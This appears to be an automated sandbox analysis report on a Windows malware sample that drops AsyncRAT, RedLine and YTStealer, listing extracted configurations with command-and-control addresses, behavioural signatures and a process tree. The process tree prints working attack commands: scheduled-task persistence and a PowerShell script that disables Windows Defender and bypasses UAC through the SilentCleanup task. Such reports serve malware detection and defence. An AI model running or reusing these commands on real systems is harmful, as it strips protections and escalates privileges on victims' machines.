Analysis
-
max time kernel
118s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20220721-en -
resource tags
arch:x64arch:x86image:win10v2004-20220721-enlocale:en-usos:windows10-2004-x64system -
submitted
30/07/2022, 13:01
Behavioral task
behavioral1
Sample
48084-116-0x0000000000ED0000-0x00000000013FA000-memory.exe
Resource
win7-20220718-en
General
-
Target
48084-116-0x0000000000ED0000-0x00000000013FA000-memory.exe
-
Size
5.2MB
-
MD5
9170ac4e0a5177f903c178360de91dfb
-
SHA1
f4ca61c687fea0482a2b331b98f218b4f92d9041
-
SHA256
f2ff7231a4988f1810539eef98fe32d896b67c3ed1b38c89149696a10c79e205
-
SHA512
6bfcf506f1b2ebe8612c1638284e7ec60ad48f5a72cc9c225b0e7b52aff23d3bd3207bc65b0161f94680ce55e58047311245065ebc83af14c336151bca0cbafd
Malware Config
Extracted
asyncrat
1.0.7
glhff
179.43.162.20:1337
vasdvasavavaba
-
delay
1
-
install
true
-
install_file
winlogonl.exe
-
install_folder
%Temp%
Extracted
redline
193.106.191.160:8673
-
auth_value
7824e9f60118486d456c723edbe36fe1
Signatures
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection powershell.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" pizda vam.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" pizda vam.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" pizda vam.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" ULKPF.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" ULKPF.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" ULKPF.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 1 IoCs
resource yara_rule behavioral2/memory/190772-174-0x0000000000400000-0x0000000000420000-memory.dmp family_redline -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 4964 created 660 4964 powershell.exe 4 -
YTStealer payload 2 IoCs
resource yara_rule behavioral2/memory/60-263-0x0000000000530000-0x0000000001308000-memory.dmp family_ytstealer behavioral2/memory/60-265-0x0000000000530000-0x0000000001308000-memory.dmp family_ytstealer -
Async RAT payload 5 IoCs
resource yara_rule behavioral2/memory/4440-130-0x0000000000E80000-0x00000000013AA000-memory.dmp asyncrat behavioral2/files/0x0008000000022e2d-139.dat asyncrat behavioral2/files/0x0008000000022e2d-140.dat asyncrat behavioral2/memory/158780-312-0x0000000000F70000-0x000000000149A000-memory.dmp asyncrat behavioral2/memory/158780-316-0x0000000000F70000-0x000000000149A000-memory.dmp asyncrat -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 5us64diotf.exe -
Downloads MZ/PE file
-
Executes dropped EXE 18 IoCs
pid Process 4560 winlogonl.exe 1776 gmx.exe 191180 panel nac.exe 191424 dllhost.exe 4056 pizda vam.exe 516 ULKPF.exe 60 yu.exe 3196 cc0mdfd2asm.exe 158248 1.exe 158424 7z.exe 158460 7z.exe 158508 7z.exe 158580 7z.exe 158616 7z.exe 158668 7z.exe 158704 7z.exe 158780 5us64diotf.exe 158832 build.exe -
resource yara_rule behavioral2/files/0x0006000000022e55-239.dat upx behavioral2/files/0x0006000000022e55-240.dat upx behavioral2/memory/60-241-0x0000000000530000-0x0000000001308000-memory.dmp upx behavioral2/memory/60-263-0x0000000000530000-0x0000000001308000-memory.dmp upx behavioral2/memory/60-265-0x0000000000530000-0x0000000001308000-memory.dmp upx -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 5us64diotf.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 5us64diotf.exe -
Checks computer location settings 2 TTPs 7 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000\Control Panel\International\Geo\Nation 48084-116-0x0000000000ED0000-0x00000000013FA000-memory.exe Key value queried \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000\Control Panel\International\Geo\Nation winlogonl.exe Key value queried \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000\Control Panel\International\Geo\Nation dllhost.exe Key value queried \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000\Control Panel\International\Geo\Nation ULKPF.exe Key value queried \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000\Control Panel\International\Geo\Nation rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000\Control Panel\International\Geo\Nation 1.exe Key value queried \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000\Control Panel\International\Geo\Nation rundll32.exe -
Loads dropped DLL 7 IoCs
pid Process 158424 7z.exe 158460 7z.exe 158508 7z.exe 158580 7z.exe 158616 7z.exe 158668 7z.exe 158704 7z.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" pizda vam.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" ULKPF.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 5us64diotf.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 1776 set thread context of 190772 1776 gmx.exe 116 PID 3196 set thread context of 157364 3196 cc0mdfd2asm.exe 150 PID 158832 set thread context of 23876 158832 build.exe 172 -
Launches sc.exe 3 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 3188 sc.exe 3804 sc.exe 1352 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
pid pid_target Process procid_target 24052 191424 WerFault.exe 128 -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4612 schtasks.exe 1120 schtasks.exe 3052 schtasks.exe -
Delays execution with timeout.exe 3 IoCs
pid Process 3248 timeout.exe 4596 timeout.exe 191348 timeout.exe -
Modifies data under HKEY_USERS 46 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4440 48084-116-0x0000000000ED0000-0x00000000013FA000-memory.exe 4440 48084-116-0x0000000000ED0000-0x00000000013FA000-memory.exe 4440 48084-116-0x0000000000ED0000-0x00000000013FA000-memory.exe 4440 48084-116-0x0000000000ED0000-0x00000000013FA000-memory.exe 4440 48084-116-0x0000000000ED0000-0x00000000013FA000-memory.exe 4440 48084-116-0x0000000000ED0000-0x00000000013FA000-memory.exe 4440 48084-116-0x0000000000ED0000-0x00000000013FA000-memory.exe 4440 48084-116-0x0000000000ED0000-0x00000000013FA000-memory.exe 4440 48084-116-0x0000000000ED0000-0x00000000013FA000-memory.exe 4440 48084-116-0x0000000000ED0000-0x00000000013FA000-memory.exe 4440 48084-116-0x0000000000ED0000-0x00000000013FA000-memory.exe 4440 48084-116-0x0000000000ED0000-0x00000000013FA000-memory.exe 4440 48084-116-0x0000000000ED0000-0x00000000013FA000-memory.exe 4440 48084-116-0x0000000000ED0000-0x00000000013FA000-memory.exe 4440 48084-116-0x0000000000ED0000-0x00000000013FA000-memory.exe 4440 48084-116-0x0000000000ED0000-0x00000000013FA000-memory.exe 4440 48084-116-0x0000000000ED0000-0x00000000013FA000-memory.exe 4440 48084-116-0x0000000000ED0000-0x00000000013FA000-memory.exe 4440 48084-116-0x0000000000ED0000-0x00000000013FA000-memory.exe 4440 48084-116-0x0000000000ED0000-0x00000000013FA000-memory.exe 4440 48084-116-0x0000000000ED0000-0x00000000013FA000-memory.exe 4440 48084-116-0x0000000000ED0000-0x00000000013FA000-memory.exe 4440 48084-116-0x0000000000ED0000-0x00000000013FA000-memory.exe 4964 powershell.exe 4964 powershell.exe 4964 powershell.exe 4964 powershell.exe 5036 powershell.exe 5036 powershell.exe 5036 powershell.exe 4180 powershell.exe 4180 powershell.exe 4560 winlogonl.exe 191072 powershell.exe 191072 powershell.exe 4560 winlogonl.exe 4788 powershell.exe 4788 powershell.exe 190772 AppLaunch.exe 4560 winlogonl.exe 788 powershell.exe 788 powershell.exe 1216 powershell.exe 1216 powershell.exe 516 ULKPF.exe 157364 AppLaunch.exe 157364 AppLaunch.exe 157364 AppLaunch.exe 157364 AppLaunch.exe 157364 AppLaunch.exe 157364 AppLaunch.exe 157364 AppLaunch.exe 157364 AppLaunch.exe 157364 AppLaunch.exe 157364 AppLaunch.exe 157364 AppLaunch.exe 157364 AppLaunch.exe 157364 AppLaunch.exe 157364 AppLaunch.exe 157364 AppLaunch.exe 157364 AppLaunch.exe 157364 AppLaunch.exe 157364 AppLaunch.exe 157364 AppLaunch.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4440 48084-116-0x0000000000ED0000-0x00000000013FA000-memory.exe Token: SeDebugPrivilege 4560 winlogonl.exe Token: SeDebugPrivilege 4964 powershell.exe Token: SeDebugPrivilege 212 whoami.exe Token: SeDebugPrivilege 212 whoami.exe Token: SeDebugPrivilege 212 whoami.exe Token: SeDebugPrivilege 212 whoami.exe Token: SeDebugPrivilege 212 whoami.exe Token: SeDebugPrivilege 212 whoami.exe Token: SeDebugPrivilege 212 whoami.exe Token: SeDebugPrivilege 212 whoami.exe Token: SeDebugPrivilege 212 whoami.exe Token: SeDebugPrivilege 212 whoami.exe Token: SeDebugPrivilege 212 whoami.exe Token: SeDebugPrivilege 212 whoami.exe Token: SeDebugPrivilege 212 whoami.exe Token: SeDebugPrivilege 212 whoami.exe Token: SeDebugPrivilege 212 whoami.exe Token: SeDebugPrivilege 212 whoami.exe Token: SeDebugPrivilege 212 whoami.exe Token: SeDebugPrivilege 212 whoami.exe Token: SeDebugPrivilege 212 whoami.exe Token: SeDebugPrivilege 212 whoami.exe Token: SeDebugPrivilege 212 whoami.exe Token: SeDebugPrivilege 212 whoami.exe Token: SeDebugPrivilege 212 whoami.exe Token: SeDebugPrivilege 212 whoami.exe Token: SeDebugPrivilege 212 whoami.exe Token: SeDebugPrivilege 212 whoami.exe Token: SeDebugPrivilege 5036 powershell.exe Token: SeDebugPrivilege 3880 whoami.exe Token: SeDebugPrivilege 3880 whoami.exe Token: SeDebugPrivilege 3880 whoami.exe Token: SeDebugPrivilege 3880 whoami.exe Token: SeDebugPrivilege 3880 whoami.exe Token: SeDebugPrivilege 3880 whoami.exe Token: SeDebugPrivilege 3880 whoami.exe Token: SeDebugPrivilege 3880 whoami.exe Token: SeDebugPrivilege 4180 powershell.exe Token: SeDebugPrivilege 191072 powershell.exe Token: SeDebugPrivilege 191180 panel nac.exe Token: SeDebugPrivilege 191424 dllhost.exe Token: SeDebugPrivilege 4788 powershell.exe Token: SeDebugPrivilege 190772 AppLaunch.exe Token: SeDebugPrivilege 4056 pizda vam.exe Token: SeDebugPrivilege 788 powershell.exe Token: SeDebugPrivilege 516 ULKPF.exe Token: SeDebugPrivilege 1216 powershell.exe Token: SeDebugPrivilege 157364 AppLaunch.exe Token: SeRestorePrivilege 158424 7z.exe Token: 35 158424 7z.exe Token: SeSecurityPrivilege 158424 7z.exe Token: SeSecurityPrivilege 158424 7z.exe Token: SeRestorePrivilege 158460 7z.exe Token: 35 158460 7z.exe Token: SeSecurityPrivilege 158460 7z.exe Token: SeSecurityPrivilege 158460 7z.exe Token: SeRestorePrivilege 158508 7z.exe Token: 35 158508 7z.exe Token: SeSecurityPrivilege 158508 7z.exe Token: SeSecurityPrivilege 158508 7z.exe Token: SeRestorePrivilege 158580 7z.exe Token: 35 158580 7z.exe Token: SeSecurityPrivilege 158580 7z.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4440 wrote to memory of 3076 4440 48084-116-0x0000000000ED0000-0x00000000013FA000-memory.exe 83 PID 4440 wrote to memory of 3076 4440 48084-116-0x0000000000ED0000-0x00000000013FA000-memory.exe 83 PID 4440 wrote to memory of 2196 4440 48084-116-0x0000000000ED0000-0x00000000013FA000-memory.exe 85 PID 4440 wrote to memory of 2196 4440 48084-116-0x0000000000ED0000-0x00000000013FA000-memory.exe 85 PID 3076 wrote to memory of 4612 3076 cmd.exe 87 PID 3076 wrote to memory of 4612 3076 cmd.exe 87 PID 2196 wrote to memory of 4596 2196 cmd.exe 88 PID 2196 wrote to memory of 4596 2196 cmd.exe 88 PID 2196 wrote to memory of 4560 2196 cmd.exe 89 PID 2196 wrote to memory of 4560 2196 cmd.exe 89 PID 4560 wrote to memory of 4964 4560 winlogonl.exe 90 PID 4560 wrote to memory of 4964 4560 winlogonl.exe 90 PID 4964 wrote to memory of 3188 4964 powershell.exe 92 PID 4964 wrote to memory of 3188 4964 powershell.exe 92 PID 4964 wrote to memory of 2632 4964 powershell.exe 93 PID 4964 wrote to memory of 2632 4964 powershell.exe 93 PID 4964 wrote to memory of 212 4964 powershell.exe 95 PID 4964 wrote to memory of 212 4964 powershell.exe 95 PID 4964 wrote to memory of 2104 4964 powershell.exe 96 PID 4964 wrote to memory of 2104 4964 powershell.exe 96 PID 4964 wrote to memory of 2300 4964 powershell.exe 97 PID 4964 wrote to memory of 2300 4964 powershell.exe 97 PID 4964 wrote to memory of 5036 4964 powershell.exe 98 PID 4964 wrote to memory of 5036 4964 powershell.exe 98 PID 5036 wrote to memory of 3804 5036 powershell.exe 100 PID 5036 wrote to memory of 3804 5036 powershell.exe 100 PID 5036 wrote to memory of 4616 5036 powershell.exe 101 PID 5036 wrote to memory of 4616 5036 powershell.exe 101 PID 5036 wrote to memory of 3880 5036 powershell.exe 103 PID 5036 wrote to memory of 3880 5036 powershell.exe 103 PID 5036 wrote to memory of 4276 5036 powershell.exe 104 PID 5036 wrote to memory of 4276 5036 powershell.exe 104 PID 5036 wrote to memory of 1352 5036 powershell.exe 105 PID 5036 wrote to memory of 1352 5036 powershell.exe 105 PID 4560 wrote to memory of 440 4560 winlogonl.exe 109 PID 4560 wrote to memory of 440 4560 winlogonl.exe 109 PID 440 wrote to memory of 4180 440 cmd.exe 111 PID 440 wrote to memory of 4180 440 cmd.exe 111 PID 4180 wrote to memory of 1776 4180 powershell.exe 112 PID 4180 wrote to memory of 1776 4180 powershell.exe 112 PID 4180 wrote to memory of 1776 4180 powershell.exe 112 PID 1776 wrote to memory of 190772 1776 gmx.exe 116 PID 1776 wrote to memory of 190772 1776 gmx.exe 116 PID 1776 wrote to memory of 190772 1776 gmx.exe 116 PID 1776 wrote to memory of 190772 1776 gmx.exe 116 PID 1776 wrote to memory of 190772 1776 gmx.exe 116 PID 4560 wrote to memory of 191016 4560 winlogonl.exe 119 PID 4560 wrote to memory of 191016 4560 winlogonl.exe 119 PID 191016 wrote to memory of 191072 191016 cmd.exe 121 PID 191016 wrote to memory of 191072 191016 cmd.exe 121 PID 191072 wrote to memory of 191180 191072 powershell.exe 122 PID 191072 wrote to memory of 191180 191072 powershell.exe 122 PID 191180 wrote to memory of 191288 191180 panel nac.exe 124 PID 191180 wrote to memory of 191288 191180 panel nac.exe 124 PID 191288 wrote to memory of 191348 191288 cmd.exe 126 PID 191288 wrote to memory of 191348 191288 cmd.exe 126 PID 191288 wrote to memory of 191424 191288 cmd.exe 128 PID 191288 wrote to memory of 191424 191288 cmd.exe 128 PID 191424 wrote to memory of 190792 191424 dllhost.exe 129 PID 191424 wrote to memory of 190792 191424 dllhost.exe 129 PID 190792 wrote to memory of 1120 190792 cmd.exe 131 PID 190792 wrote to memory of 1120 190792 cmd.exe 131 PID 4560 wrote to memory of 2100 4560 winlogonl.exe 132 PID 4560 wrote to memory of 2100 4560 winlogonl.exe 132 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 158760 attrib.exe
Processes
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:660
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}2⤵
- Modifies Windows Defender Real-time Protection settings
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5036 -
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" qc windefend3⤵
- Launches sc.exe
PID:3804
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"3⤵PID:4616
-
-
C:\Windows\system32\whoami.exe"C:\Windows\system32\whoami.exe" /groups3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3880
-
-
C:\Windows\system32\net1.exe"C:\Windows\system32\net1.exe" stop windefend3⤵PID:4276
-
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" config windefend depend= RpcSs-TOGGLE3⤵
- Launches sc.exe
PID:1352
-
-
-
C:\Users\Admin\AppData\Local\Temp\48084-116-0x0000000000ED0000-0x00000000013FA000-memory.exe"C:\Users\Admin\AppData\Local\Temp\48084-116-0x0000000000ED0000-0x00000000013FA000-memory.exe"1⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4440 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "winlogonl" /tr '"C:\Users\Admin\AppData\Local\Temp\winlogonl.exe"' & exit2⤵
- Suspicious use of WriteProcessMemory
PID:3076 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "winlogonl" /tr '"C:\Users\Admin\AppData\Local\Temp\winlogonl.exe"'3⤵
- Creates scheduled task(s)
PID:4612
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp7BBC.tmp.bat""2⤵
- Suspicious use of WriteProcessMemory
PID:2196 -
C:\Windows\system32\timeout.exetimeout 33⤵
- Delays execution with timeout.exe
PID:4596
-
-
C:\Users\Admin\AppData\Local\Temp\winlogonl.exe"C:\Users\Admin\AppData\Local\Temp\winlogonl.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4560 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc @ ( e c h o   o f f % ) [ 1 ]  
 s p   ' H K C U : \ V o l a t i l e   E n v i r o n m e n t '   ' T o g g l e D e f e n d e r '   @ '  
 i f   ( $ ( s c . e x e   q c   w i n d e f e n d )   - l i k e   ' * T O G G L E * ' )   { $ T O G G L E = 7 ; $ K E E P = 6 ; $ A = ' E n a b l e ' ; $ S = ' O F F ' } e l s e { $ T O G G L E = 6 ; $ K E E P = 7 ; $ A = ' D i s a b l e ' ; $ S = ' O N ' }  
  
 i f   ( $ e n v : 1   - n e   6   - a n d   $ e n v : 1   - n e   7 )   {   $ e n v : 1 = $ T O G G L E   }  
  
 s t a r t   c m d   - a r g s   ' / d / r   S e c u r i t y H e a l t h S y s t r a y   &   " % P r o g r a m F i l e s % \ W i n d o w s   D e f e n d e r \ M S A S C u i L . e x e " '   - w i n   1  
  
 $ n o t i f = ' H K C U : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \ N o t i f i c a t i o n s \ S e t t i n g s \ W i n d o w s . S y s t e m T o a s t . S e c u r i t y A n d M a i n t e n a n c e '  
 n i   $ n o t i f   - e a   0 | o u t - n u l l ;   r i   $ n o t i f . r e p l a c e ( ' S e t t i n g s ' , ' C u r r e n t ' )   - R e c u r s e   - F o r c e   - e a   0  
 s p   $ n o t i f   E n a b l e d   0   - T y p e   D w o r d   - F o r c e   - e a   0 ;   i f   ( $ T O G G L E   - e q   7 )   { r p   $ n o t i f   E n a b l e d   - F o r c e   - e a   0 }  
  
 $ t s = N e w - O b j e c t   - C o m O b j e c t   ' S c h e d u l e . S e r v i c e ' ;   $ t s . C o n n e c t ( ) ;   $ b a f f l i n g = $ t s . G e t F o l d e r ( ' \ M i c r o s o f t \ W i n d o w s \ D i s k C l e a n u p ' )  
 $ b p a s s = $ b a f f l i n g . G e t T a s k ( ' S i l e n t C l e a n u p ' ) ;   $ f l a w = $ b p a s s . D e f i n i t i o n  
  
 $ u = 0 ; $ w = w h o a m i   / g r o u p s ; i f ( $ w - l i k e ' * 1 - 5 - 3 2 - 5 4 4 * ' ) { $ u = 1 } ; i f ( $ w - l i k e ' * 1 - 1 6 - 1 2 2 8 8 * ' ) { $ u = 2 } ; i f ( $ w - l i k e ' * 1 - 1 6 - 1 6 3 8 4 * ' ) { $ u = 3 }  
  
 $ r = [ c h a r ] 1 3 ;   $ n f o = [ c h a r ] 3 9 + $ r + '   ( \       / ) ' + $ r + ' (   *   .   *   )     A   l i m i t e d   a c c o u n t   p r o t e c t s   y o u   f r o m   U A C   e x p l o i t s ' + $ r + '         ` ` ` ' + $ r + [ c h a r ] 3 9  
 $ s c r i p t = ' - n o p   - w i n   1   - c   &   { r p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ; $ A v e Y o = ' + $ n f o + ' ; $ e n v : 1 = ' + $ e n v : 1 ;   $ e n v : _ _ C O M P A T _ L A Y E R = ' I n s t a l l e r '  
 $ s c r i p t + = ' ; i e x ( ( g p   R e g i s t r y : : H K E Y _ U s e r s \ S - 1 - 5 - 2 1 * \ V o l a t i l e *   T o g g l e D e f e n d e r   - e a   0 ) [ 0 ] . T o g g l e D e f e n d e r ) } ' ;   $ c m d = ' p o w e r s h e l l   ' + $ s c r i p t  
  
 i f   ( $ u   - e q   0 )   {  
     s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 ;   b r e a k  
 }  
 i f   ( $ u   - e q   1 )   {  
     i f   ( $ f l a w . A c t i o n s . I t e m ( 1 ) . P a t h   - i n o t l i k e   ' * w i n d i r * ' ) { s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 ;   b r e a k }  
     s p   h k c u : \ e n v i r o n m e n t   w i n d i r   $ ( ' p o w e r s h e l l   ' + $ s c r i p t + '   # ' )  
     $ z = $ b p a s s . R u n E x ( $ n u l l , 2 , 0 , $ n u l l ) ;   $ w a i t = 0 ;   w h i l e ( $ b p a s s . S t a t e   - g t   3   - a n d   $ w a i t   - l t   1 7 ) { s l e e p   - m   1 0 0 ;   $ w a i t + = 0 . 1 }  
     i f ( g p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ) { r p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ; s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 } ; b r e a k  
 }  
 i f   ( $ u   - e q   2 )   {  
